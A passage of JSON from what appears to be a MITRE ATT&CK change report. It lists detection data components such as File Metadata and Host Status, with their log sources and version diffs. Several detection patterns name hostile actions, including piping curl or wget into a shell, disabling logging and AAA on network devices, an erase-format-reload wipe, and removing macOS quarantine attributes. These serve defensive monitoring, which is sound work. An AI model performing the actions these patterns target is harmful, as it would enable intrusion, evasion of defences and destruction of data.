                            "name": "networkdevice:Firewall",
                            "channel": "Audit trail or CLI/API access indicating commands like no access-list, delete rule-set, clear config"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Command Audit / Configuration Change"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "eventlog"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "command_exec"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "command-exec: CLI commands containing \"show clock\", \"show clock detail\", \"show timezone\" executed by suspicious user/source"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "cmd='show aaa*' OR 'show running-config | include password|aaa' OR 'show aaa common-criteria policy all'"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "CLI command audit"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "system boot logs"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "exec command='monitor capture'"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "no logging buffered, no aaa new-model, disable firewall"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "interactive shell logging"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "command sequence: erase \u2192 format \u2192 reload"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "CLI Command Logging"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "CLI Command Audit"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "command audit"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Privilege-level command execution"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Detected CLI command to export key material"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "reload command issued"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "syslog facility LOCAL7 or trap messages"
                        },
                        {
                            "name": "saas:PRMetadata",
                            "channel": "Commit message or branch name contains encoded strings or payload indicators"
                        },
                        {
                            "name": "vpxd.log",
                            "channel": "VM inventory queries and configuration enumeration through vCenter API calls"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Office-Alerts",
                            "channel": "Unexpected DLL or component loaded at Office startup"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Office-Alerts",
                            "channel": "Office application warning or alert on macro execution from template"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Office/OutlookAddinMonitor",
                            "channel": "Outlook loading add-in via unexpected load path or non-default profile context"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Get-ADTrust|GetAllTrustRelationships"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "EventCode=4103, 4104, 4105, 4106"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Execution of Microsoft script to enumerate custom forms in Outlook mailbox"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "CommandLine=copy-item or robocopy from UNC path"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "PowerShell launched from outlook.exe or triggered without user invocation"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Execution of PowerShell script to enumerate or remove malicious Home Page folder config"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Exchange Cmdlets"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "CmdletName: Get-Recipient, Get-User"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Execution of 'Get-WmiObject Win32_Product' or similar PowerShell cmdlets"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Execution of PowerShell without -NoProfile flag"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "EventCode=4101"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4103, 4104, 4105, 4106"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 19:47:16.123000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"android:logcat\", \"channel\": \"Command 'pm list packages' executed by app sandbox or child proc\"}, \"root['x_mitre_log_sources'][2]\": {\"name\": \"auditd:EXECVE\", \"channel\": \"execve of script/interpreter (bash, python, node) with suspicious encoded or non-printable content\"}, \"root['x_mitre_log_sources'][21]\": {\"name\": \"auditd:EXECVE\", \"channel\": \"execve of curl,wget,bash,sh,python with piped or remote content\"}, \"root['x_mitre_log_sources'][22]\": {\"name\": \"auditd:EXECVE\", \"channel\": \"execve, kill, ptrace, insmod, rmmod targeting security processes\"}, \"root['x_mitre_log_sources'][103]\": {\"name\": \"esxi:shell\", \"channel\": \"esxcli system syslog config set/reload, services.sh restart/stop\"}, \"root['x_mitre_log_sources'][230]\": {\"name\": \"macos:unifiedlog\", \"channel\": \"Execution of osascript, sh, bash, zsh, installer, open\"}, \"root['x_mitre_log_sources'][231]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application spawns shell, command interpreter, or command-executing child process with arguments during command-execution phase\"}, \"root['x_mitre_log_sources'][232]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application spawns Unix shell process or superuser binary such as sh, su, toybox, toolbox, or shell-like child process with parameters during execution phase\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--f5a9a1dd-82f9-41a3-85b8-13e5b9cd6c79",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.274000+00:00",
                    "modified": "2026-04-16 17:02:15.878000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0074",
                            "external_id": "DC0074"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Driver Metadata",
                    "description": "to contextual data about a driver, including its attributes, functionality, and activity. This can involve details such as the driver's origin, integrity, cryptographic signature, issues reported during its use, and runtime behavior. Examples include metadata captured during driver integrity checks, hash validation, or error reporting. Examples: \n\n- Driver Signature Validation: A driver is validated to ensure it is signed by a trusted Certificate Authority (CA).\n- Driver Hash Verification: The hash of a driver is compared to a known good hash stored in a database.\n- Driver Compatibility Issues: A driver error is logged due to compatibility issues with a particular version of the operating system.\n- Vulnerable Driver Identification: Metadata indicates the driver version is outdated or contains a known vulnerability.\n- Monitoring Driver Integrity: Drivers are monitored for any unauthorized modifications to their binary or associated files.\n\nThis data component can be collected through the following measures:\n\nWindows\n\n- Windows Event Logs:\n    - Event ID 3000-3006: Logs metadata about driver signature validation.\n    - Event ID 2000-2011 (Windows Defender Application Control): Tracks driver integrity and policy enforcement.\n- Sysmon Logs: Configure Sysmon to capture driver loading metadata (Event ID 6).\n- Driver Verifier: Use Driver Verifier to collect diagnostic and performance data about drivers, including stability and compatibility metrics.\n- PowerShell: Use commands to retrieve metadata about installed drivers:\n`Get-WindowsDriver -Online | Select-Object Driver, ProviderName, Version`\n\nLinux\n\n- Auditd: Configure audit rules to monitor driver interactions and collect metadata: `auditctl -w /lib/modules/ -p rwxa -k driver_metadata`\n- dmesg: Use `dmesg` to extract kernel logs with driver metadata: `dmesg | grep \"module\"`\n- lsmod and modinfo: Commands to list loaded modules and retrieve metadata about drivers: `lsmod` | `modinfo <module_name>`\n\nmacOS\n\n- Unified Logs: Collect metadata from system logs about kernel extensions (kexts): `log show --predicate 'eventMessage contains \"kext load\"' --info`\n- kextstat: Command to retrieve information about loaded kernel extensions: `kextstat`\n\nSIEM Tools\n\n- Ingest Driver Metadata: Collect driver metadata logs from Sysmon, Auditd, or macOS logs into SIEMs like Splunk or Elastic.\n\nVulnerability Management Tools\n\n- Use these tools to collect metadata about vulnerable drivers across enterprise systems.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Extension disabled, unloaded, failed to start"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_sources']\": [{\"name\": \"macos:unifiedlog\", \"channel\": \"Extension disabled, unloaded, failed to start\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 17:02:15.878000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-23 18:33:47.956000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0059",
                            "external_id": "DC0059"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "File Metadata",
                    "description": "contextual information about a file, including attributes such as the file's name, size, type, content (e.g., signatures, headers, media), user/owner, permissions, timestamps, and other related properties. File metadata provides insights into a file's characteristics and can be used to detect malicious activity, unauthorized modifications, or other anomalies. Examples: \n\n- File Ownership and Permissions: Checking the owner and permissions of a critical configuration file like /etc/passwd on Linux or C:\\Windows\\System32\\config\\SAM on Windows.\n- Timestamps: Analyzing the creation, modification, and access timestamps of a file.\n- File Content and Signatures: Extracting the headers of an executable file to verify its signature or detect packing/obfuscation.\n- File Attributes: Analyzing attributes like hidden, system, or read-only flags in Windows.\n- File Hashes: Generating MD5, SHA-1, or SHA-256 hashes of files to compare against threat intelligence feeds.\n- File Location: Monitoring files located in unusual directories or paths, such as temporary or user folders.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "stat and lstat syscall results on files, including inode and permission info"
                        },
                        {
                            "name": "AndroidLogs:Framework",
                            "channel": "BroadcastReceiver registration for android.intent.action.BOOT_COMPLETED by previously unseen or recently installed apps"
                        },
                        {
                            "name": "auditd:CONFIG_CHANGE",
                            "channel": "chmod or chown of hook files indicating privilege escalation or execution permission change"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "file path matches exclusion directories"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "PATH"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "file path modifications on critical system directories (/etc, /usr/bin, /usr/sbin, /var, /opt)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Inotify watch creation or auditctl changes on /etc/cron* or /lib/systemd/system/"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "PATH"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "file write after sleep delay"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "syscall in (chmod, fchmod, fchmodat, chown, fchown, fchownat, setxattr, lsetxattr, fsetxattr)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "setuid or setgid bit changes"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "syscall in (chmod, fchmod, fchmodat, chown, fchown, fchownat, lchown, setxattr, lsetxattr, fsetxattr, removexattr, lremovexattr, fremovexattr)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "setxattr or getxattr system call"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chmod, chown, setxattr, or file writes to /etc/ssl/* or /usr/local/share/ca-certificates/*"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "Unexpected container volume unmount + file deletion"
                        },
                        {
                            "name": "EDR:detection",
                            "channel": "App reputation telemetry"
                        },
                        {
                            "name": "EDR:file",
                            "channel": "File Metadata Inspection (Low String Entropy, Missing PDB)"
                        },
                        {
                            "name": "EDR:file",
                            "channel": "File Metadata Analysis (PE overlays, entropy)"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "host daemon events related to file or VM permission changes"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "Datastore file hidden or renamed unexpectedly"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Upload of file to datastore"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Storage access and file ops"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "VMware kernel events for file system permission modifications"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Datastore modification events"
                        },
                        {
                            "name": "File",
                            "channel": "None"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "/var/log/install.log"
                        },
                        {
                            "name": "fs:filesystem",
                            "channel": "Binary file hash changes outside of update/patch cycles"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "file system events indicating permission or attribute changes"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "filesystem monitoring of exec/open"
                        },
                        {
                            "name": "fwupd:logs",
                            "channel": "Firmware updates applied or failed"
                        },
                        {
                            "name": "gatekeeper/quarantine database",
                            "channel": "LaunchServices quarantine"
                        },
                        {
                            "name": "journald:package",
                            "channel": "dpkg/apt or yum/dnf transaction logs (install/update of build tools)"
                        },
                        {
                            "name": "journald:package",
                            "channel": "dpkg/apt/yum/dnf transaction logs; vendor updaters in systemd journals"
                        },
                        {
                            "name": "journald:package",
                            "channel": "dpkg/apt install, remove, upgrade events"
                        },
                        {
                            "name": "journald:package",
                            "channel": "yum/dnf install or update transactions"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "event-based"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events, hash"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "hash, elf_info, file_metadata"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "elf_info, hash, yara_matches"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Read headers and detect MIME type mismatch"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events.path"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Filesystem modifications to trusted paths"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Write or modify .desktop file in XDG autostart path"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "hash, rpm_packages, deb_packages, file_events"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Discrepancies in _VBA_PROJECT p-code vs source code extracted with oletools/pcodedmp"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "application or system execution logs"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "file permission modification events in kernel messages"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "kernel messages related to file system permission changes and security violations"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "es_event_file_rename_t or es_event_file_write_t"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "es_event_authentication"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "code_signing, file_metadata"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "mach_o_info, file_metadata"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "softwareupdated/homebrew/install logs, pkginstalld events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "AMFI or Gatekeeper signature/notarization failures for newly installed dev components"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Detection of altered _VBA_PROJECT or PerformanceCache streams"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem:syspolicyd"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File metadata updated with UF_HIDDEN flag"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Code signature validation fails or is absent post-binary modification"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Code signing verification failures or bypassed trust decisions"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of new LaunchAgent or LoginItem plist files in ~/Library/LaunchAgents/"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "filesystem events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "xattr -d com.apple.quarantine or similar attribute removal commands"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Gatekeeper quarantine policy decision anomalies recorded in com.apple.LaunchServices.QuarantineEventsV2"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "pkginstalld/softwareupdated/Homebrew install transactions"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "AMFI/Gatekeeper code signature or notarization failures"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "kernel extension and system extension logs related to file system security violations or SIP bypass attempts"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected application binary modifications or altered signing status"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "extended attribute write or modification"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "New certificate trust settings added by unexpected process"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.lsd"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "installer or system_installd 'PackageKit: install succeeded/failed' with non-notarized or unknown signer"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Gatekeeper/AMFI 'code signature invalid' / 'not notarized' messages"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File creation or modification with com.apple.ResourceFork extended attribute"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "OS version query results inconsistent with expected or approved version list"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Observed File Transfers"
                        },
                        {
                            "name": "OpenBSM:AuditTrail",
                            "channel": "BSM audit events for file permission modifications"
                        },
                        {
                            "name": "OpenBSM:AuditTrail",
                            "channel": "BSM audit events for file permission, ownership, and attribute modifications with user context"
                        },
                        {
                            "name": "saas:RepoEvents",
                            "channel": "New file added or modified in PR targeting CI/CD or build config (e.g., `gitlab-ci.yml`, `build.gradle`, `pom.xml`, `.github/workflows/*.yml`)"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "Invalid/Unsigned image when developer tool launches newly installed binaries"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "Unsigned or invalid image for newly installed/updated binaries"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "Code integrity violations in boot-start drivers or firmware"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "CodeIntegrity reports 'Invalid image hash' or 'Unsigned image' for new/updated binaries"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
                            "channel": "SmartScreen or ASR blocks on newly downloaded installer/updater"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4656, 4658"
                        },
                        {
                            "name": "WinEventLog:Setup",
                            "channel": "MSI/Product install, repair or update events"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=15"
                        },
                        {
                            "name": "WinEventLog:Windows Defender",
                            "channel": "Operational log"
                        },
                        {
                            "name": "WinEventLog:Windows Defender",
                            "channel": "Operational"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:33:47.956000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"auditd:SYSCALL\", \"channel\": \"stat and lstat syscall results on files, including inode and permission info\"}, \"root['x_mitre_log_sources'][1]\": {\"name\": \"AndroidLogs:Framework\", \"channel\": \"BroadcastReceiver registration for android.intent.action.BOOT_COMPLETED by previously unseen or recently installed apps\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--8e44412e-3238-4d64-8878-4f11e27784fe",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.275000+00:00",
                    "modified": "2026-03-13 22:21:38.311000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0099",
                            "external_id": "DC0099"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Group Enumeration",
                    "description": "Extracting group lists from identity systems identifies permissions, roles, or configurations. Adversaries may exploit high-privilege groups or misconfigurations. Examples:\n\n- AWS CLI: `aws iam list-groups`\n- PowerShell: `Get-ADGroup -Filter *`\n- (Saas) Google Workspace: Admin SDK Directory API\n- Azure: `Get-AzureADGroup`\n- Microsoft 365:  Graph API `GET https://graph.microsoft.com/v1.0/groups`\n\n*Data Collection Measures:*\n\n- Cloud Logging: Enable AWS CloudTrail, Azure Activity Logs, and Google Workspace Admin Logs for group-related actions.\n- Directory Monitoring: Track logs like AD Event ID 4662 (object operations).\n- API Monitoring: Log API activity like AWS IAM queries.\n- SaaS Monitoring: Use platform logs (e.g., Office 365 Unified Audit Logs).\n- SIEM Integration: Centralize group query tracking.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "ListGroups, ListAttachedRolePolicies"
                        },
                        {
                            "name": "azure:audit",
                            "channel": "az ad user get-member-groups, Get-AzRoleAssignment"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "cloudidentity.groups.list"
                        },
                        {
                            "name": "saas:salesforce",
                            "channel": "GET /services/data/vXX.X/groups"
                        },
                        {
                            "name": "saas:github",
                            "channel": "GET /orgs/:org/teams, GET /teams/:team/members"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4798, 4799"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-13 22:21:38.311000+00:00\", \"old_value\": \"2025-10-21 15:14:39.499000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0099\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0099\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][5]\": {\"name\": \"WinEventLog:Security\", \"channel\": \"EventCode=4798, 4799\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-04-20 18:17:23.974000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0018",
                            "external_id": "DC0018"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Host Status",
                    "description": "Logging, messaging, and other artifacts that highlight the health and operational state of host-based security sensors, such as Endpoint Detection and Response (EDR) agents, antivirus software, logging services, and system monitoring tools. Monitoring sensor health is essential for detecting misconfigurations, sensor failures, tampering, or deliberate security control evasion by adversaries.\n\n*Data Collection Measures:*\n\n- Windows Event Logs:\n    - Event ID 1074 (System Shutdown): Detects unexpected system reboots/shutdowns.\n    - Event ID 6006 (Event Log Stopped): Logs when Windows event logging is stopped.\n    - Event ID 16 (Sysmon): Detects configuration state changes that may indicate log tampering.\n    - Event ID 12 (Windows Defender Status Change) \u2013 Detects changes in Windows Defender state.\n- Linux/macOS Monitoring:\n    - `/var/log/syslog`, `/var/log/auth.log`, `/var/log/kern.log`\n    - Journald (journalctl) for kernel and system alerts.\n- Endpoint Detection and Response (EDR) Tools:\n    - Monitor agent health status, detect sensor tampering, and alert on missing telemetry.\n- Mobile Threat Intelligence Logs:\n    - Samsung Knox, SafetyNet, iOS Secure Enclave provide sensor health status for mobile endpoints.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "networkdevice:syslog",
                            "channel": "no logging host, no aaa new-model, no snmp-server, commit"
                        },
                        {
                            "name": "android:appops",
                            "channel": "ACCESS_FINE_LOCATION|NEARBY_DEVICES|BLUETOOTH_SCAN used in close proximity to network-context queries"
                        },
                        {
                            "name": "AndroidAttestation:SafetyNet",
                            "channel": "SafetyNet attestation with CTSProfileMatch=false or BasicIntegrity=false"
                        },
                        {
                            "name": "AndroidAttestation:VerifiedBoot",
                            "channel": "Verified Boot or dm-verity reports partition hash mismatch, non-green boot state, or integrity failure"
                        },
                        {
                            "name": "AndroidLogs:Crash",
                            "channel": "Crash or abnormal restart of privileged system services (for example, system_server, mediaserver, installd) followed shortly by new privileged process activity or binder connections from a single app UID"
                        },
                        {
                            "name": "AndroidLogs:Crash",
                            "channel": "Application or system process crash/restart patterns temporally associated with remote service communications"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "firmware_update, kexec_load"
                        },
                        {
                            "name": "AWS:CloudMetrics",
                            "channel": "Autoscaling, memory/cpu alarms, or instance unhealthiness"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "Sustained spike in CPU usage on EC2 instance with web service role"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "StatusCheckFailed or StatusCheckFailed_System for burstable instances (t2/t3)"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "Sustained EC2 CPU usage above normal baseline"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "NetworkOut spike beyond baseline"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "Sudden spike in network output without a corresponding inbound request ratio"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "Unusual CPU burst or metric anomalies"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Powering off or restarting host"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Device risk, compliance, or security posture changes after trusted host pairing or developer-state transition"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "code signature validation failure / exec of invalidly-signed payload from sandboxed app"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Application crash logs, watchdog terminations, or abnormal execution events associated with service communication"
                        },
                        {
                            "name": "journald:boot",
                            "channel": "Secure Boot failure, firmware version change"
                        },
                        {
                            "name": "kubernetes:events",
                            "channel": "CrashLoopBackOff, OOMKilled, container restart count exceeds threshold"
                        },
                        {
                            "name": "linux:procfs",
                            "channel": "Sustained high /proc/[pid]/stat usage"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Out of memory killer invoked or kernel panic entries"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Service stop or disable messages for security tools not reflected in SIEM alerts"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "system is powering down"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "interface_details "
                        },
                        {
                            "name": "macos:syslog",
                            "channel": "Hardware UUID or device list drift"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Web service process (e.g., httpd) entering crash loop or consuming excessive CPU"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Spike in CPU or memory use from non-user-initiated processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Termination or disabling of XProtect, Gatekeeper, or third-party AV daemons"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network stack resource exhaustion, tcp_accept queue overflow, repeated resets"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "EFI firmware integrity check failed"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "System Integrity Protection (SIP) state reported as disabled"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "System shutdown or reboot requested"
                        },
                        {
